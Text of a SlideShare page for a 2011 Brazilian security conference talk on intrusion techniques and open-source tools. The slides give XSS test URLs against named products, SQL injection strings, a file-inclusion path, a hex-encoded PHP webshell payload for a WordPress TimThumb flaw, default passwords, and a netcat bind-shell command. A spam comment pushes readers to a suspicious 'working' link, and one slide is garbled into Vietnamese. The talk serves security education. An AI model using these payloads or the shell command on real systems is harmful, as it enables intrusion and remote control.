Vale Security Conference - 2011 - 4 - Ewerson Guimarães (Crash) [DC Labs]


Published on

Vale Security Conference - 2011
Sábado - 4ª Palestra
Palestrante : Ewerson Guimarães (Crash)
Palestra : Técnicas de intrusão - Ferramentas open source
Twitter (Ewerson Guimarães) :!/crashbrz
Vídeo da Palestra (You Tube) :
Slide (SlideShare) :

Published in: Technology
1 Comment
  • The            setup            in            the            video            no            longer            works.           
    And            all            other            links            in            comment            are            fake            too.           
    But            luckily,            we            found            a            working            one            here (copy paste link in browser) :  
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Vale Security Conference - 2011 - 4 - Ewerson Guimarães (Crash) [DC Labs]

  1. 1. Intrusion Techniques DcLabs Hacking Tour 2011Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  2. 2. chương trình nghị sựVân tayThất bại ở những nơiPhía sau cánh cửabạo lựcvỏ mãkhai thácMáy quétEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  3. 3. FingerPrint Grab informations about a target host. Ex: Its used to identify Operational System and/or Services(daemon) version number by TCP/IP responses unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –PN host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion)Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  4. 4. Passive - FingerPrint • TTL - When the operating system sets the Time To Live on the outbound packet • Window Size - When the operating system sets the Window Size at. • DF - =The operating system set the Dont Fragment bit. • TOS - The operating system set the Type of Service, and if so, at what.Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  5. 5. FingerPrintMatrix:Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  6. 6. FingerPrintU. BourneEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  7. 7. FingerPrintIn BackTrack Linux you can find many softwares toFinger-Print Http://www.backtrack-linux.comEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  8. 8. Web VulnerabilityThese vulnerabilities are initially explored throughmalicious browser requests compromising the targetin a matter of minutes Cross Site (XSS) – Reflected / Stored SQL-Injection PHP (LFI / RFI/ AFU / RCE)Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  9. 9. Web VulnerabilityCross-site scripting (XSS) is a type of computer securityvulnerability typically found in web applications that enablesmalicious attackers to inject client-side script into web pagesviewed by other users.Spekx – Knowledge Base -http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3ELMS Web Ensino – TOTVShttp://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=BuscarEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  10. 10. Web Vulnerability Reflected / Stored Xss DEMOEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  11. 11. Web VulnerabilityEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  12. 12. What is the impact?Why?Examples?Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  13. 13. Web VulnerabilitySQL-InjectionIt occurs when the attacker can insert a series of SQL statementswithin a query by manipulating the data entry application.SELECT campos FROM tabela WHERE campo =;Inject string: some OR x=xSELECT fields FROM table WHERE field = ‘some OR x=x;admin-- " or 0=0 # or 1=1-- hi or a=a or 0=0 -- or 0=0 # " or 1=1-- hi) or (a=a" or 0=0 -- or x=x or 1=1-- hi") or ("a"="aor 0=0 -- " or "x"="x or a=a-- ‘);Drop table x;-- or 0=0 # ) or (x=x hi" or 1=1 -- ) or (a=aEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  14. 14. SQL-Injection LIVE DEMO OCOMON Throwing fudge at the fanEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  15. 15. Web VulnerabilityCGI/PHP Command InjectionIt occurs when the attacker insert a series ofcommands exploiting vulnerable CGI/PHP scriptsOneorZero – AFU + LFIhttp://server/oneorzero/index.php?controller=../[FILE].phpWordPress TimThumb (Theme) Plugin – RCE x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  16. 16. Default/Weak passwordsDefault passwords are set by its manufacturers/developersand were not changed after the installation/configuration.As supplied by the system vendor and meant to be changed atinstallation time (Nobody do this shit)Ex: Sw 3Com:User: security - Pass: securityFireBird:User: sysdba - Pass: masterkeyWeak: Passwords that are easily guessed or in a keyboardsequentialEx: 123456 - Love - House´s phone - Birthday - Etc...Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  17. 17. Brute ForceIt consists in using random combinations ofcharacters/numbers and symbols, wordlists and/orstring generators to crack a passwordEx:John the RipperHydraSSH Brute ForceEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  18. 18. Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application serversEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  19. 19. ExploitsKinds of Exploits:Local: Usually, the objective of a local exploit is to elevateusers privileges on the machine as close as possible toroot (uid=0) or administrator. They are written to exploitkernel bugs or suid binariesRemote: It works over a network connection andexploit the vulnerable target without any prior access to it.www.securityfocus.comwww.secunia.comwww.exploit-db.com0Days It works usually an unpublished exploit from a brandnew found vulnerability. You can buy! $$$$$Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  20. 20. ExploitsIf Kernel was patched? Will we cry? Alexos=>Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  21. 21. Exploits No!!!! Fuck him!!! We have others ways to pwn the box GNU C library dynamic linker Suid´s Etc...Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  22. 22. Backdoors/RootKitsUsed to maintain access to the systemWe can Netcat use for this purpose:nc –vlp 5555 –e /bin/bashPHP - ASP - JSPRootKitsThe main purpose of a rootkit is to hide the attackers presencereplacing vital system binaries from targets systemExample:Hide files (with match strings)Run command when match stringsHide processesHide open ports, and others.Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  23. 23. Scanners/FuzzersThere are 2 types of scanners: Specific which are written fora specific vulnerability (BSQLHacker, SQLMAP) and Genericwhich are written for various kinds of vulnerabilities. Genericscanners use known service banners/strings to locate thepotential target/vulnerabilities W3af NessusEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  24. 24. Scanners/FuzzersEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  25. 25. Scanners/FuzzersEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  26. 26. SniffersSniffer monitors and analyzes network traffic. Some of thesepackets may contain critical information (such as logins,passwords and cool infos )WhireShark -Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  27. 27. MetaSploitEwerson Guimarães (Crash) DcLabs – HackingTour 2011
  28. 28. MetaSploit Let´s Fuck Windows?Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  29. 29. Hardening your serverHnTool is an open source (GPLv2) hardening tool for Unix.It scans your system for vulnerabilities or problems inconfiguration files allowing you to get a quick overview ofthe security status of your system.Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  30. 30. Questions?Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  31. 31. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  32. 32. Contact Crash - Irc: #dclabs twitter: @crashbrzEwerson Guimarães (Crash) DcLabs – HackingTour 2011